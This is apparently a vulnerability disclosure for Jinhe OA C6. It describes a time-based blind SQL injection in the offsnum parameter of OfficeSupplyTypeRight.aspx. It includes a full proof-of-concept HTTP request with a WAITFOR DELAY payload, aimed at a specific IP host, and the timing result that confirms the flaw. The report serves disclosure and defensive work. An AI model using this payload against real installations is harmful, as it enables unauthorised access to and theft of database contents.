vuln-report

Information

Vendor of the products: Jinher (Beijing Jinhe Network Technology Co., Ltd.)

Vendor’s website: Jinher-金和网络

Affected products: Jinhe OA (Kingsoft C6 Collaborative Management Platform)

Affected firmware version: C6

Report: smitug01

Overview

Beijing Jinhe Network Technology Co., Ltd. (http://www.jinher.com/) is a company specializing in collaborative management software (OA) and information technology solutions. The company is committed to providing efficient and secure digital office platforms for government agencies and enterprises.

Jinhe OA has a front-end SQL injection vulnerability, which attackers can exploit to obtain sensitive data.

Vulnerability details

Vulnerability Location: /C6/Jhsoft.Web.officesupply/OfficeSupplyTypeRight.aspx

The OfficeSupplyTypeRight.aspx endpoint accepts user-controllable parameters (id and offsnum) without proper sanitization, leading to a time-based blind SQL injection vulnerability.

POC

The current database name can be determined by the delay.

GET /C6/Jhsoft.Web.officesupply/OfficeSupplyTypeRight.aspx/?id=1&offsnum=1';+IF+(SELECT+DB_NAME())+=+'C6'+WAITFOR+DELAY+'0:0:3'--%20q HTTP/1.1
Host: 221.1.82.114:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: ASP.NET_SessionId=okgmxfvchdt4xykp0kpyh2vd
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 192.168.12.4
Priority: u=0, i

The response was delayed by approximately 4 seconds (4,145 millis), confirming the SQL injection vulnerability and that the current database name is C6.